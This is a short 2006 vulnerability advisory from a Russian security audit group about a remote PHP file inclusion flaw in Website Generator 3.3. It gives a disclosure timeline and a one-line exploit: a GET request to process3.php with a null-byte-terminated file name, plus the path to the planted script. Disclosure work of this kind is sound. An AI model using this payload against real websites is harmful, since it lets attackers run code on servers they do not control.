NSA Group Advisory - Website Generator version 3.3 suffers from an arbitrary remote PHP file inclusion flaw.
885da198541b682486a9824c51d6e3e1c076266899c8404b0a0cd280901f787f
Advisory:
NSAG-ยน202-25.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
WEBSITE GENERATOR 3.3
Site of manufacturer:
http://freehostshop.com
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/894.html
Risk:
Hide
Description:
The removed user, can upload php script from other server and execute
custom php code on webserver.
Exploit:
Method GET:
http://example.com/files/myforms/process3.php?formname=attack.php%00*name[0]=
Link:
http://example.com/files/myforms/forms/attack.php
More information:
http://www.nsag.ru/vuln/894.html
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.